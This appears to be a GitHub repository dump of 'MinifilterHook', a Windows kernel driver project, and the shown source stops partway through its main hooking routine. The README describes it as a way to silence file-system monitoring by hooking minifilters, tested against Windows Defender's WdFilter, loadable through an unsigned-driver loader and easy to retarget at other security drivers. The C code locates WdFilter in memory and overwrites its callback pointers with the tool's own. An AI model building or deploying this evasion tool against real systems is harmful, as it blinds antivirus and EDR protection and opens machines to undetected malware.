├── HowItWorks.pdf ├── README.md ├── WdfltHook ├── WdfltHook.inf ├── WdfltHook.sln ├── WdfltHook │ ├── WdfltHook.c │ ├── WdfltHook.inf │ ├── WdfltHook.rc │ ├── WdfltHook.sln │ ├── WdfltHook.vcxproj │ ├── WdfltHook.vcxproj.filters │ ├── fltmgtr.h │ ├── ntdefs.h │ ├── restore_list.h │ └── x64 │ │ └── Release │ │ ├── WdfltHook.inf │ │ ├── WdfltHook.log │ │ ├── WdfltHook.obj │ │ ├── WdfltHook.res │ │ ├── WdfltHook.sys.recipe │ │ ├── WdfltHook.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── Inf2Cat.command.1.tlog │ │ ├── WdfltHook.lastbuildstate │ │ ├── inf2cat-expand.10100.read.1.tlog │ │ ├── inf2cat-expand.10100.write.1.tlog │ │ ├── inf2cat-expand.10144.read.1.tlog │ │ ├── inf2cat-expand.10144.write.1.tlog │ │ ├── inf2cat-expand.10320.read.1.tlog │ │ ├── inf2cat-expand.10320.write.1.tlog │ │ ├── inf2cat-expand.10720.read.1.tlog │ │ ├── inf2cat-expand.10720.write.1.tlog │ │ ├── inf2cat-expand.10748.read.1.tlog │ │ ├── inf2cat-expand.10748.write.1.tlog │ │ ├── inf2cat-expand.10780.read.1.tlog │ │ ├── inf2cat-expand.10780.write.1.tlog │ │ ├── inf2cat-expand.11144.read.1.tlog │ │ ├── inf2cat-expand.11144.write.1.tlog │ │ ├── inf2cat-expand.11200.read.1.tlog │ │ ├── inf2cat-expand.11200.write.1.tlog │ │ ├── inf2cat-expand.11596.read.1.tlog │ │ ├── inf2cat-expand.11596.write.1.tlog │ │ ├── inf2cat-expand.2880.read.1.tlog │ │ ├── inf2cat-expand.2880.write.1.tlog │ │ ├── inf2cat-expand.4016.read.1.tlog │ │ ├── inf2cat-expand.4016.write.1.tlog │ │ ├── inf2cat-expand.4332.read.1.tlog │ │ ├── inf2cat-expand.4332.write.1.tlog │ │ ├── inf2cat-expand.4344.read.1.tlog │ │ ├── inf2cat-expand.4344.write.1.tlog │ │ ├── inf2cat-expand.5868.read.1.tlog │ │ ├── inf2cat-expand.5868.write.1.tlog │ │ ├── inf2cat-expand.5884.read.1.tlog │ │ ├── inf2cat-expand.5884.write.1.tlog │ │ ├── inf2cat-expand.6024.read.1.tlog │ │ ├── inf2cat-expand.6024.write.1.tlog │ │ ├── inf2cat-expand.7112.read.1.tlog │ │ ├── inf2cat-expand.7112.write.1.tlog │ │ ├── inf2cat-expand.8152.read.1.tlog │ │ ├── inf2cat-expand.8152.write.1.tlog │ │ ├── inf2cat-expand.8376.read.1.tlog │ │ ├── inf2cat-expand.8376.write.1.tlog │ │ ├── inf2cat-expand.8756.read.1.tlog │ │ ├── inf2cat-expand.8756.write.1.tlog │ │ ├── inf2cat-expand.9316.read.1.tlog │ │ ├── inf2cat-expand.9316.write.1.tlog │ │ ├── inf2cat-expand.9328.read.1.tlog │ │ ├── inf2cat-expand.9328.write.1.tlog │ │ ├── inf2cat-expand.9368.read.1.tlog │ │ ├── inf2cat-expand.9368.write.1.tlog │ │ ├── inf2cat-expand.9388.read.1.tlog │ │ ├── inf2cat-expand.9388.write.1.tlog │ │ ├── inf2cat-expand.9552.read.1.tlog │ │ ├── inf2cat-expand.9552.write.1.tlog │ │ ├── inf2cat-expand.9576.read.1.tlog │ │ ├── inf2cat-expand.9576.write.1.tlog │ │ ├── inf2cat-expand.9608.read.1.tlog │ │ ├── inf2cat-expand.9608.write.1.tlog │ │ ├── inf2cat-expand.9632.read.1.tlog │ │ ├── inf2cat-expand.9632.write.1.tlog │ │ ├── inf2cat-expand.9636.read.1.tlog │ │ ├── inf2cat-expand.9636.write.1.tlog │ │ ├── inf2cat-expand.9752.read.1.tlog │ │ ├── inf2cat-expand.9752.write.1.tlog │ │ ├── inf2cat-expand.read.1.tlog │ │ ├── inf2cat-expand.write.1.tlog │ │ ├── inf2cat.read.1.tlog │ │ ├── inf2cat.write.1.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ ├── link.write.1.tlog │ │ ├── rc.command.1.tlog │ │ ├── rc.read.1.tlog │ │ ├── rc.write.1.tlog │ │ ├── signtool.command.1.tlog │ │ ├── signtool.read.1.tlog │ │ ├── signtool.timestamp.1.tlog │ │ ├── signtool.write.1.tlog │ │ ├── stampinf.command.1.tlog │ │ ├── stampinf.read.1.tlog │ │ └── stampinf.write.1.tlog │ │ └── vc142.pdb └── x64 │ └── Release │ ├── WdfltHook.cer │ ├── WdfltHook.inf │ ├── WdfltHook.pdb │ ├── WdfltHook.sys │ └── WdfltHook │ ├── WdfltHook.inf │ ├── WdfltHook.sys │ └── wdflthook.cat └── gitignore.txt /HowItWorks.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/HowItWorks.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MinifilterHook 2 | Silence file system monitoring components by hooking their minifilters 3 | 4 | Tested on Windows 10 1903, 21H2 and 22H2 against WdFilter 5 | 6 | POC can be easily modified to target other filter drivers -> simply change TARGET_FILTER_NAME and TARGET_FILTER_DRIVER 7 | 8 | # Usage: 9 | **Install .inf file -> right click + install or use SetupApi to install programtically** 10 | 11 | **Load WdfltHook.sys -> via an unsigned driver loader like : https://github.com/0mWindyBug/KDP-compatible-driver-loader/tree/main** 12 | 13 | # How it works 14 | See "HowItWorks.pdf" (English) or https://www.digitalwhisper.co.il/files/Zines/0x9C/DW156-2-FilteringMinifilters.pdf (Hebrew) 15 | *************************** 16 | # Demo 17 | Before loading our driver: 18 | 19 | ![demo1](https://github.com/0mWindyBug/MinifilterHook/assets/139051196/27474da0-726d-4e26-b785-9926138f23a8) 20 | 21 | After loading our driver: 22 | 23 | ![demp4](https://github.com/0mWindyBug/MinifilterHook/assets/139051196/39a15be7-5233-47f0-948e-b056beac0aba) 24 | 25 | 26 | # Notes 27 | - Thanks to @GetRektBoy724 for his contribution 28 | - We restore everything during unload so be aware 29 | - Similar implementation using only a r/w primitive from UM (no driver) has been published & integrated to https://github.com/wavestone-cdt/EDRSandblast 30 | 31 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook.inf: -------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = "Template" 13 | DriverVer = 09/29/2023,23.51.50.349 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | %DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instances specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 98 | Instance1.Flags = 0x0 ; Allow all attachments 99 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.33927.289 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WdfltHook", "WdfltHook\WdfltHook.vcxproj", "{0D6423DD-7D02-4436-8C83-7F2069F5F388}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|ARM64 = Debug|ARM64 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|ARM = Release|ARM 15 | Release|ARM64 = Release|ARM64 16 | Release|x64 = Release|x64 17 | Release|x86 = Release|x86 18 | EndGlobalSection 19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 20 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.ActiveCfg = Debug|ARM 21 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.Build.0 = Debug|ARM 22 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.Deploy.0 = Debug|ARM 23 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.ActiveCfg = Debug|ARM64 24 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.Build.0 = Debug|ARM64 25 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.Deploy.0 = Debug|ARM64 26 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.ActiveCfg = Debug|x64 27 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.Build.0 = Debug|x64 28 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.Deploy.0 = Debug|x64 29 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.ActiveCfg = Debug|Win32 30 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.Build.0 = Debug|Win32 31 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.Deploy.0 = Debug|Win32 32 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.ActiveCfg = Release|ARM 33 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.Build.0 = Release|ARM 34 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.Deploy.0 = Release|ARM 35 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.ActiveCfg = Release|ARM64 36 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.Build.0 = Release|ARM64 37 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.Deploy.0 = Release|ARM64 38 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.ActiveCfg = Release|x64 39 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.Build.0 = Release|x64 40 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.Deploy.0 = Release|x64 41 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.ActiveCfg = Release|Win32 42 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.Build.0 = Release|Win32 43 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.Deploy.0 = Release|Win32 44 | EndGlobalSection 45 | GlobalSection(SolutionProperties) = preSolution 46 | HideSolutionNode = FALSE 47 | EndGlobalSection 48 | GlobalSection(ExtensibilityGlobals) = postSolution 49 | SolutionGuid = {55558C6C-46F7-434F-A023-93E4BC6B38AD} 50 | EndGlobalSection 51 | EndGlobal 52 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #pragma prefast(disable:__WARNING_ENCODE_MEMBER_FUNCTION_POINTER, "Not valid for kernel mode drivers") 9 | #define DRIVER_TAG 'dtag' 10 | #define TARGET_FILTER_NAME L"WdFilter" 11 | #define TARGET_FILTER_DRIVER "WdFilter.sys" 12 | 13 | 14 | int HooksExecuting = 0; 15 | DWORD64 TargetDriverStart = 0; 16 | ULONG TargetDriverSize = 0; 17 | 18 | ULONG_PTR OperationStatusCtx = 1; 19 | 20 | PRESTORE_NODE RestoreList = NULL; 21 | PFLT_FILTER gFilterHandle; 22 | LONG64 null_address = 0x0; 23 | 24 | #define PTDBG_TRACE_ROUTINES 0x00000001 25 | #define PTDBG_TRACE_OPERATION_STATUS 0x00000002 26 | 27 | ULONG gTraceFlags = 0; 28 | 29 | 30 | #define PT_DBG_PRINT( _dbgLevel, _string ) \ 31 | (FlagOn(gTraceFlags,(_dbgLevel)) ? \ 32 | DbgPrint _string : \ 33 | ((int)0)) 34 | 35 | /************************************************************************* 36 | Prototypes 37 | *************************************************************************/ 38 | 39 | 40 | // RESTORE LIST FUNCTIONS 41 | 42 | 43 | VOID SaveOrigCallback(PVOID AddrOfCallback, LONG64 Callback) 44 | { 45 | PRESTORE_NODE NewNode = ExAllocatePoolWithTag(NonPagedPool, sizeof(RESTORE_NODE), DRIVER_TAG); 46 | if (NewNode) 47 | { 48 | NewNode->AddrOfCallback = AddrOfCallback; 49 | NewNode->Callback = Callback; 50 | NewNode->Next = NULL; 51 | if (RestoreList == NULL) 52 | { 53 | RestoreList = NewNode; 54 | } 55 | else 56 | { 57 | PRESTORE_NODE current = RestoreList; 58 | while (current->Next != NULL) 59 | { 60 | current = current->Next; 61 | } 62 | current->Next = NewNode; 63 | } 64 | } 65 | } 66 | 67 | VOID UnhookCallbacks() 68 | { 69 | if (RestoreList) 70 | { 71 | PRESTORE_NODE current = RestoreList; 72 | while (current != NULL) 73 | { 74 | InterlockedExchange64(current->AddrOfCallback, current->Callback); 75 | current = current->Next; 76 | } 77 | } 78 | DbgPrint("[WdFilter_Hook] Successfully Unhooked Callbacks!\n"); 79 | } 80 | 81 | 82 | VOID CleanupRestoreList() 83 | { 84 | if (RestoreList) 85 | { 86 | PRESTORE_NODE current = RestoreList; 87 | while (current != NULL) 88 | { 89 | ExFreePool(current); 90 | current = current->Next; 91 | } 92 | } 93 | 94 | } 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | EXTERN_C_START 107 | 108 | DRIVER_INITIALIZE DriverEntry; 109 | NTSTATUS 110 | DriverEntry ( 111 | _In_ PDRIVER_OBJECT DriverObject, 112 | _In_ PUNICODE_STRING RegistryPath 113 | ); 114 | 115 | NTSTATUS 116 | WdfltHookInstanceSetup ( 117 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 118 | _In_ FLT_INSTANCE_SETUP_FLAGS Flags, 119 | _In_ DEVICE_TYPE VolumeDeviceType, 120 | _In_ FLT_FILESYSTEM_TYPE VolumeFilesystemType 121 | ); 122 | 123 | VOID 124 | WdfltHookInstanceTeardownStart ( 125 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 126 | _In_ FLT_INSTANCE_TEARDOWN_FLAGS Flags 127 | ); 128 | 129 | VOID 130 | WdfltHookInstanceTeardownComplete ( 131 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 132 | _In_ FLT_INSTANCE_TEARDOWN_FLAGS Flags 133 | ); 134 | 135 | NTSTATUS 136 | WdfltHookUnload ( 137 | _In_ FLT_FILTER_UNLOAD_FLAGS Flags 138 | ); 139 | 140 | NTSTATUS 141 | WdfltHookInstanceQueryTeardown ( 142 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 143 | _In_ FLT_INSTANCE_QUERY_TEARDOWN_FLAGS Flags 144 | ); 145 | 146 | FLT_PREOP_CALLBACK_STATUS 147 | WdfltHookPreOperation ( 148 | _Inout_ PFLT_CALLBACK_DATA Data, 149 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 150 | _Flt_CompletionContext_Outptr_ PVOID *CompletionContext 151 | ); 152 | 153 | VOID 154 | WdfltHookOperationStatusCallback ( 155 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 156 | _In_ PFLT_IO_PARAMETER_BLOCK ParameterSnapshot, 157 | _In_ NTSTATUS OperationStatus, 158 | _In_ PVOID RequesterContext 159 | ); 160 | 161 | FLT_POSTOP_CALLBACK_STATUS 162 | WdfltHookPostOperation ( 163 | _Inout_ PFLT_CALLBACK_DATA Data, 164 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 165 | _In_opt_ PVOID CompletionContext, 166 | _In_ FLT_POST_OPERATION_FLAGS Flags 167 | ); 168 | 169 | FLT_PREOP_CALLBACK_STATUS 170 | WdfltHookPreOperationNoPostOperation ( 171 | _Inout_ PFLT_CALLBACK_DATA Data, 172 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 173 | _Flt_CompletionContext_Outptr_ PVOID *CompletionContext 174 | ); 175 | 176 | BOOLEAN 177 | WdfltHookDoRequestOperationStatus( 178 | _In_ PFLT_CALLBACK_DATA Data 179 | ); 180 | 181 | EXTERN_C_END 182 | 183 | // 184 | // Assign text sections for each routine. 185 | // 186 | 187 | #ifdef ALLOC_PRAGMA 188 | #pragma alloc_text(INIT, DriverEntry) 189 | #pragma alloc_text(PAGE, WdfltHookUnload) 190 | #pragma alloc_text(PAGE, WdfltHookInstanceQueryTeardown) 191 | #pragma alloc_text(PAGE, WdfltHookInstanceSetup) 192 | #pragma alloc_text(PAGE, WdfltHookInstanceTeardownStart) 193 | #pragma alloc_text(PAGE, WdfltHookInstanceTeardownComplete) 194 | #endif 195 | 196 | // 197 | // operation registration 198 | // 199 | 200 | CONST FLT_OPERATION_REGISTRATION Callbacks[] = { 201 | 202 | 203 | 204 | { IRP_MJ_OPERATION_END } 205 | }; 206 | 207 | 208 | 209 | CONST FLT_REGISTRATION FilterRegistration = { 210 | 211 | sizeof( FLT_REGISTRATION ), // Size 212 | FLT_REGISTRATION_VERSION, // Version 213 | 0, // Flags 214 | 215 | NULL, // Context 216 | Callbacks, // Operation callbacks 217 | 218 | WdfltHookUnload, // MiniFilterUnload 219 | 220 | WdfltHookInstanceSetup, // InstanceSetup 221 | WdfltHookInstanceQueryTeardown, // InstanceQueryTeardown 222 | WdfltHookInstanceTeardownStart, // InstanceTeardownStart 223 | WdfltHookInstanceTeardownComplete, // InstanceTeardownComplete 224 | 225 | NULL, // GenerateFileName 226 | NULL, // GenerateDestinationFileName 227 | NULL // NormalizeNameComponent 228 | 229 | }; 230 | 231 | 232 | 233 | NTSTATUS 234 | WdfltHookInstanceSetup ( 235 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 236 | _In_ FLT_INSTANCE_SETUP_FLAGS Flags, 237 | _In_ DEVICE_TYPE VolumeDeviceType, 238 | _In_ FLT_FILESYSTEM_TYPE VolumeFilesystemType 239 | ) 240 | 241 | { 242 | UNREFERENCED_PARAMETER( FltObjects ); 243 | UNREFERENCED_PARAMETER( Flags ); 244 | UNREFERENCED_PARAMETER( VolumeDeviceType ); 245 | UNREFERENCED_PARAMETER( VolumeFilesystemType ); 246 | 247 | PAGED_CODE(); 248 | 249 | PT_DBG_PRINT( PTDBG_TRACE_ROUTINES, 250 | ("WdfltHook!WdfltHookInstanceSetup: Entered\n") ); 251 | 252 | return STATUS_SUCCESS; 253 | } 254 | 255 | 256 | NTSTATUS 257 | WdfltHookInstanceQueryTeardown ( 258 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 259 | _In_ FLT_INSTANCE_QUERY_TEARDOWN_FLAGS Flags 260 | ) 261 | 262 | { 263 | UNREFERENCED_PARAMETER( FltObjects ); 264 | UNREFERENCED_PARAMETER( Flags ); 265 | 266 | PAGED_CODE(); 267 | 268 | PT_DBG_PRINT( PTDBG_TRACE_ROUTINES, 269 | ("WdfltHook!WdfltHookInstanceQueryTeardown: Entered\n") ); 270 | 271 | return STATUS_SUCCESS; 272 | } 273 | 274 | 275 | VOID 276 | WdfltHookInstanceTeardownStart ( 277 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 278 | _In_ FLT_INSTANCE_TEARDOWN_FLAGS Flags 279 | ) 280 | 281 | { 282 | UNREFERENCED_PARAMETER( FltObjects ); 283 | UNREFERENCED_PARAMETER( Flags ); 284 | 285 | PAGED_CODE(); 286 | 287 | PT_DBG_PRINT( PTDBG_TRACE_ROUTINES, 288 | ("WdfltHook!WdfltHookInstanceTeardownStart: Entered\n") ); 289 | } 290 | 291 | 292 | VOID 293 | WdfltHookInstanceTeardownComplete ( 294 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 295 | _In_ FLT_INSTANCE_TEARDOWN_FLAGS Flags 296 | ) 297 | 298 | { 299 | UNREFERENCED_PARAMETER( FltObjects ); 300 | UNREFERENCED_PARAMETER( Flags ); 301 | 302 | PAGED_CODE(); 303 | 304 | PT_DBG_PRINT( PTDBG_TRACE_ROUTINES, 305 | ("WdfltHook!WdfltHookInstanceTeardownComplete: Entered\n") ); 306 | } 307 | 308 | 309 | /************************************************************************* 310 | MiniFilter initialization and unload routines. 311 | *************************************************************************/ 312 | PCHAR GetNameFromFullName(PCHAR FullName) { 313 | SIZE_T FullNameLength = strlen(FullName); 314 | 315 | for (SIZE_T i = FullNameLength; i > 0; i--) { 316 | if (*(FullName + i) == '\\') { 317 | return FullName + i + 1; 318 | } 319 | } 320 | 321 | return NULL; 322 | } 323 | 324 | BOOLEAN IsCallbackNode(PCALLBACK_NODE PotentialCallbackNode, PFLT_INSTANCE FltInstance, DWORD64 DriverStartAddr, DWORD64 DriverSize) { 325 | // take the range of the driver instead of enumerating the driver every validation 326 | return ((PotentialCallbackNode->Instance == FltInstance) && 327 | (DWORD64)PotentialCallbackNode->PreOperation > DriverStartAddr && 328 | (DWORD64)PotentialCallbackNode->PreOperation < (DriverStartAddr + DriverSize) && 329 | (DWORD64)PotentialCallbackNode->PostOperation > DriverStartAddr && 330 | (DWORD64)PotentialCallbackNode->PostOperation < (DriverStartAddr + DriverSize)); 331 | } 332 | 333 | PVOID InitDriverGlobals() 334 | { 335 | PVOID LocalIntBase = NULL; 336 | PRTL_PROCESS_MODULES ModuleInformation = NULL; 337 | NTSTATUS result; 338 | ULONG SizeNeeded; 339 | SIZE_T InfoRegionSize; 340 | BOOL output = FALSE; 341 | PROTOTYPE_ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation; 342 | UNICODE_STRING ZQSIname; 343 | // Get addr of zqsi 344 | RtlInitUnicodeString(&ZQSIname, L"ZwQuerySystemInformation"); 345 | ZwQuerySystemInformation = (PROTOTYPE_ZWQUERYSYSTEMINFORMATION)MmGetSystemRoutineAddress(&ZQSIname); 346 | // Get info size 347 | result = ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)0x0B, NULL, 0, &SizeNeeded); 348 | if (result != 0xC0000004) 349 | { 350 | return NULL; 351 | } 352 | InfoRegionSize = SizeNeeded; 353 | // Get Info 354 | while (result == 0xC0000004) 355 | { 356 | InfoRegionSize += 0x1000; 357 | ModuleInformation = (PRTL_PROCESS_MODULES)ExAllocatePool(NonPagedPoolNx, InfoRegionSize); 358 | if (ModuleInformation == NULL) 359 | { 360 | return NULL; 361 | } 362 | result = ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)0x0B, (PVOID)ModuleInformation, (ULONG)InfoRegionSize, &SizeNeeded); 363 | if (!NT_SUCCESS(result)) 364 | { 365 | return NULL; 366 | } 367 | // Enumerate through loaded drivers 368 | for (DWORD i = 0; i < ModuleInformation->NumberOfModules; i++) 369 | { 370 | if (!strcmp(GetNameFromFullName((PCHAR)ModuleInformation->Modules[i].FullPathName), TARGET_FILTER_DRIVER)) 371 | { 372 | TargetDriverStart = (DWORD64)ModuleInformation->Modules[i].ImageBase; 373 | TargetDriverSize = ModuleInformation->Modules[i].ImageSize; 374 | DbgPrint("[WdFilter_Hook] Init Target Driver : Start at %llx , Size is %d \n", TargetDriverStart, TargetDriverSize); 375 | } 376 | } 377 | 378 | 379 | 380 | 381 | } 382 | ExFreePool(ModuleInformation); 383 | return (PVOID)TargetDriverStart; 384 | } 385 | 386 | NTSTATUS HookTargetFilter(PCWSTR FilterName) 387 | { 388 | SIZE_T NumBytesReadFromInst = 0; 389 | PFLT_INSTANCE* InstanceList = NULL; 390 | ULONG InstanceListSize = 0; 391 | ULONG NumberOfInstancesReturned = 0; 392 | NTSTATUS status = STATUS_SUCCESS; 393 | UNICODE_STRING filterName; 394 | RtlInitUnicodeString(&filterName, FilterName); 395 | PFLT_FILTER fltobj = NULL; 396 | if (NT_SUCCESS(FltGetFilterFromName(&filterName, &fltobj))) 397 | { 398 | DbgPrint("[WdFilter_Hook] Found Target Filter Object!\n"); 399 | status = FltEnumerateInstances(NULL, fltobj, InstanceList, InstanceListSize, &NumberOfInstancesReturned); 400 | if (status == STATUS_BUFFER_TOO_SMALL || status == STATUS_BUFFER_OVERFLOW) 401 | { 402 | InstanceListSize = sizeof(PFLT_INSTANCE) * NumberOfInstancesReturned; 403 | InstanceList = ExAllocatePoolWithTag(PagedPool, InstanceListSize, DRIVER_TAG); 404 | if (InstanceList) 405 | { 406 | status = FltEnumerateInstances(NULL, fltobj, InstanceList, InstanceListSize, &NumberOfInstancesReturned); 407 | if (NT_SUCCESS(status)) 408 | { 409 | DbgPrint("[WdFilter_Hook] Enumerating Target Filter Object Instances!\n"); 410 | for (ULONG i = 0; i < NumberOfInstancesReturned; i++) 411 | { 412 | PFLT_INSTANCE CurrentInstance = InstanceList[i]; 413 | DbgPrint("[WdFilter_Hook] Instance at : %llx!\n", (PVOID)CurrentInstance); 414 | PCALLBACK_NODE TargetCallbackNode = NULL; 415 | // Copy Instance Memory 416 | DbgPrint("[WdFilter_Hook] Reading Instance %d Memory!", i+1); 417 | PFLT_INSTANCE CurrentInstanceVA = ExAllocatePoolWithTag(NonPagedPool, 0x230, DRIVER_TAG); 418 | MM_COPY_ADDRESS addrToRead; 419 | addrToRead.VirtualAddress = CurrentInstance; 420 | status = MmCopyMemory((PVOID)CurrentInstanceVA, addrToRead, 0x230, MM_COPY_MEMORY_VIRTUAL, &NumBytesReadFromInst); 421 | if (!NT_SUCCESS(status)) 422 | { 423 | DbgPrint("[WdFilter_Hook] Failed to read instance memory!\n", i + 1); 424 | ExFreePoolWithTag(CurrentInstanceVA, DRIVER_TAG); 425 | break; 426 | } 427 | else 428 | { 429 | // Scan for callback node 430 | for (ULONG x = 0; x < 0x230; x++) 431 | { 432 | DWORD64 PotentialPointer = *(PDWORD64)((DWORD64)CurrentInstanceVA + x); 433 | PCALLBACK_NODE PotentialNode = (PCALLBACK_NODE)PotentialPointer; 434 | if (MmIsAddressValid((PVOID)PotentialPointer)) 435 | { 436 | if (IsCallbackNode(PotentialNode, CurrentInstance, TargetDriverStart, TargetDriverSize)) 437 | { 438 | 439 | DbgPrint("[WdFilter_Hook] Found CallbackNode of %ws : Node %llx Pre: %llx Post: %llx !\n", FilterName,PotentialNode, PotentialNode->PreOperation, PotentialNode->PostOperation); 440 | if (MmIsAddressValid(PotentialNode->PreOperation)) 441 | { 442 | SaveOrigCallback(&PotentialNode->PreOperation, PotentialNode->PreOperation); 443 | InterlockedExchange64(&PotentialNode->PreOperation, WdfltHookPreOperation); 444 | } 445 | if (MmIsAddressValid(PotentialNode->PostOperation)) 446 | { 447 | SaveOrigCallback(&PotentialNode->PostOperation, PotentialNode->PostOperation); 448 | InterlockedExchange64(&PotentialNode->PostOperation, WdfltHookPostOperation); 449 | } 450 | } 451 | } 452 | } 453 | } 454 | } 455 | } 456 | ExFreePoolWithTag(InstanceList, DRIVER_TAG); 457 | } 458 | else 459 | { 460 | return STATUS_INSUFFICIENT_RESOURCES; 461 | } 462 | } 463 | FltObjectDereference(fltobj); 464 | } 465 | else 466 | { 467 | status = STATUS_UNSUCCESSFUL; 468 | } 469 | 